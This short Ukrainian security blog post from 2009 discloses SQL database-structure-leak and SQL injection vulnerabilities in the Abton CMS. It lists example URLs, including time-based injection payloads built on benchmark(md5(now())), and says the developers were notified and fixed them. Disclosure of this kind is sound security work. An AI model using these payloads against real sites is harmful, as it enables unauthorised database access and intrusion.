Websecurity - Веб безпека

16.02.2009

У березні, 31.03.2008, я знайшов SQL DB Structure Extraction та SQL Injection уразливості в системі Abton (це українська CMS). Як раз коли виявив уразливості на uareferat.com, де використовується даний движок. Також про ще одну SQL Injection в даному движку мені нещодавно повідомив Alex (в коментарях).

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

24.11.2009

SQL DB Structure Extraction:

http://site/rus/details/13220/

http://site/rus/referaty/’/

http://site/rus/’/

http://site/rus/referaty/1/-1/

http://site/abton/

На сайті на даному движку є багато подібних уразливостей, що призводять до витоку структури БД.

SQL Injection:

http://site/rus/details/’+benchmark(10000,md5(now()))+’/

http://site/rus/referaty/1′+benchmark(10000,md5(now()))-’1/

http://site/rus/’+benchmark(10000,md5(now()))+’/

Дані уразливості вже виправлені розробниками. Але в системі є чимало нових уразливостей.

This entry was posted on 19:32 24.11.2009 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.